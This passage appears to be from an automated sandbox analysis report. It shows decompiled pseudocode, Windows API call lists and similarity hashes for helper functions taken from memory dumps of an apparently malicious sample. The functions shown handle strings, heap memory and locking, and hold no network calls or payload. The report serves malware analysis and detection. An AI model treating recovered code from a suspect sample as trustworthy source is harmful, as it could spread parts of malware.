                                                                                                                                                                                                                                          				__imp__(_t8);
                                                                                                                                                                                                                                          				return _t8;
                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                          0x01129b10
                                                                                                                                                                                                                                          0x01129b19
                                                                                                                                                                                                                                          0x01129b29
                                                                                                                                                                                                                                          0x01129b29
                                                                                                                                                                                                                                          0x01129b2e
                                                                                                                                                                                                                                          0x01129b33
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129b23
                                                                                                                                                                                                                                          0x01129b23
                                                                                                                                                                                                                                          0x01129b35
                                                                                                                                                                                                                                          0x01129b3a
                                                                                                                                                                                                                                          0x01129b3e
                                                                                                                                                                                                                                          0x01129b51
                                                                                                                                                                                                                                          0x01129b57
                                                                                                                                                                                                                                          0x01129b57
                                                                                                                                                                                                                                          0x01129b60
                                                                                                                                                                                                                                          0x01129b62
                                                                                                                                                                                                                                          0x01129b66
                                                                                                                                                                                                                                          0x01129b6c

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(05649570), ref: 01129B19
                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,?,?,01124A8B,?,?,?,4D283A53,?,?), ref: 01129B23
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,01124A8B,?,?,?,4D283A53,?,?), ref: 01129B51
                                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(05649570), ref: 01129B66
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 58946197-0
                                                                                                                                                                                                                                          • Opcode ID: 11f7b33244992450c4427463c94779c8fa947fafd8abec070ba2cd6ecc2b7a8c
                                                                                                                                                                                                                                          • Instruction ID: 75afd788a0f27f819b5a0cf01ff21997d3777f902d792f27583133657a8b9faf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11f7b33244992450c4427463c94779c8fa947fafd8abec070ba2cd6ecc2b7a8c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F0DAB8A04110ABEB3C8F98E959F1A37E5EB19315B454128E612D7258C734ACA0CB59
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                                          			E01126B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                                          				intOrPtr* _t22;
                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t17 = __eax;
                                                                                                                                                                                                                                          				_t37 = 0;
                                                                                                                                                                                                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                          				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                          				_t28 = _t2;
                                                                                                                                                                                                                                          				_t34 = E011258BE(_t2);
                                                                                                                                                                                                                                          				if(_t34 != 0) {
                                                                                                                                                                                                                                          					_t30 = E011258BE(_t28);
                                                                                                                                                                                                                                          					if(_t30 == 0) {
                                                                                                                                                                                                                                          						E0112147E(_t34);
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t39 = _a4;
                                                                                                                                                                                                                                          						_t22 = E0112A8D2(_t39);
                                                                                                                                                                                                                                          						_v8 = _t22;
                                                                                                                                                                                                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                          							_a4 = _t39;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t26 = _t22 + 2;
                                                                                                                                                                                                                                          							_a4 = _t22 + 2;
                                                                                                                                                                                                                                          							_t22 = E0112A8D2(_t26);
                                                                                                                                                                                                                                          							_v8 = _t22;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						if(_t22 == 0) {
                                                                                                                                                                                                                                          							__imp__(_t34, _a4);
                                                                                                                                                                                                                                          							 *_t30 = 0x2f;
                                                                                                                                                                                                                                          							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                          							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                          							__imp__(_t30, _v8);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						 *_a8 = _t34;
                                                                                                                                                                                                                                          						_t37 = 1;
                                                                                                                                                                                                                                          						 *_a12 = _t30;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t37;
                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                          0x01126b6e
                                                                                                                                                                                                                                          0x01126b78
                                                                                                                                                                                                                                          0x01126b7a
                                                                                                                                                                                                                                          0x01126b80
                                                                                                                                                                                                                                          0x01126b80
                                                                                                                                                                                                                                          0x01126b89
                                                                                                                                                                                                                                          0x01126b8d
                                                                                                                                                                                                                                          0x01126b99
                                                                                                                                                                                                                                          0x01126b9d
                                                                                                                                                                                                                                          0x01126c11
                                                                                                                                                                                                                                          0x01126b9f
                                                                                                                                                                                                                                          0x01126b9f
                                                                                                                                                                                                                                          0x01126ba3
                                                                                                                                                                                                                                          0x01126ba8
                                                                                                                                                                                                                                          0x01126bad
                                                                                                                                                                                                                                          0x01126bc7
                                                                                                                                                                                                                                          0x01126bb6
                                                                                                                                                                                                                                          0x01126bb6
                                                                                                                                                                                                                                          0x01126bba
                                                                                                                                                                                                                                          0x01126bbd
                                                                                                                                                                                                                                          0x01126bc2
                                                                                                                                                                                                                                          0x01126bc2
                                                                                                                                                                                                                                          0x01126bcc
                                                                                                                                                                                                                                          0x01126bf4
                                                                                                                                                                                                                                          0x01126bfa
                                                                                                                                                                                                                                          0x01126bfd
                                                                                                                                                                                                                                          0x01126bce
                                                                                                                                                                                                                                          0x01126bd0
                                                                                                                                                                                                                                          0x01126bd8
                                                                                                                                                                                                                                          0x01126be3
                                                                                                                                                                                                                                          0x01126be8
                                                                                                                                                                                                                                          0x01126be8
                                                                                                                                                                                                                                          0x01126c04
                                                                                                                                                                                                                                          0x01126c0b
                                                                                                                                                                                                                                          0x01126c0c
                                                                                                                                                                                                                                          0x01126c0c
                                                                                                                                                                                                                                          0x01126b9d
                                                                                                                                                                                                                                          0x01126c1c

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0112A006,?,?,?,?,00000102,011266AF,?,?,00000000), ref: 01126B7A
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                            • Part of subcall function 0112A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,01126BA8,00000000,00000001,00000001,?,?,0112A006,?,?,?,?,00000102), ref: 0112A8E0
                                                                                                                                                                                                                                            • Part of subcall function 0112A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,0112A006,?,?,?,?,00000102,011266AF,?,?,00000000,00000000), ref: 0112A8EA
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0112A006,?,?,?,?,00000102,011266AF,?), ref: 01126BD8
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 01126BE8
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 01126BF4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3767559652-0
                                                                                                                                                                                                                                          • Opcode ID: 174ca941c83e276564968b63431d82de8d782fbbe465896d484b33aa6ae857f5
                                                                                                                                                                                                                                          • Instruction ID: 01f49802f5c5e78d8e13b10c1afc5d90577f8dc9427b988fa367b29b3dcc17ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 174ca941c83e276564968b63431d82de8d782fbbe465896d484b33aa6ae857f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8521B772904266FFCB2A6FB8C884AAFBFA9DF16284B054064FD049B241D775C970C7E1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E01125FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                          				int _t25;
                                                                                                                                                                                                                                          				int _t29;
                                                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                          				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                          				_t18 = E011258BE(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                          				_v8 = _t18;
                                                                                                                                                                                                                                          				if(_t18 != 0) {
                                                                                                                                                                                                                                          					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                          					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                          					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                          0x01125fe0
                                                                                                                                                                                                                                          0x01125fe4
                                                                                                                                                                                                                                          0x01125fee
                                                                                                                                                                                                                                          0x01125ff3
                                                                                                                                                                                                                                          0x01125ff8
                                                                                                                                                                                                                                          0x01125ffa
                                                                                                                                                                                                                                          0x01126002
                                                                                                                                                                                                                                          0x01126007
                                                                                                                                                                                                                                          0x01126015
                                                                                                                                                                                                                                          0x0112601a
                                                                                                                                                                                                                                          0x01126024

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0564937C,?,0112694E,004F0053,0564937C,?,?,?,?,?,?,01129C10), ref: 01125FDB
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0112694E,?,0112694E,004F0053,0564937C,?,?,?,?,?,?,01129C10), ref: 01125FE2
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0112694E,004F0053,0564937C,?,?,?,?,?,?,01129C10), ref: 01126002
                                                                                                                                                                                                                                          • memcpy.NTDLL(751469A0,0112694E,00000002,00000000,004F0053,751469A0,?,?,0112694E,004F0053,0564937C), ref: 01126015
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2411391700-0
                                                                                                                                                                                                                                          • Opcode ID: 32b64e42932518d6536fc0ac14d0f30899ecf76a4e7ad8ddd777cddd8fd23d64
                                                                                                                                                                                                                                          • Instruction ID: b5aa3cb30ef89a9b4f74dd83fa8820f5ee1745913c63130960898d6469c309f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32b64e42932518d6536fc0ac14d0f30899ecf76a4e7ad8ddd777cddd8fd23d64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F04F76900129BB8F15DFA9CC85CDF7BACEF192987054062EE04D7201E775EA20DBE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,00000000,00000000,01125335,616D692F,00000000), ref: 01129DFB
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 01129E03
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 01129E1A
                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 01129E25
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 74227042-0
                                                                                                                                                                                                                                          • Opcode ID: 35ecb7fb2ad7d9ebfff6a883b870219207f4b2411dc7b20c12209e6f59940aaf
                                                                                                                                                                                                                                          • Instruction ID: efa64d67f5427f81287a290f526fc7008ad54049c009a12c5e71c14105f989a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ecb7fb2ad7d9ebfff6a883b870219207f4b2411dc7b20c12209e6f59940aaf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDE01237805631BB87366FA8AC08C8FBFA9FF8A250B054925F75093118C735C9258BD5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%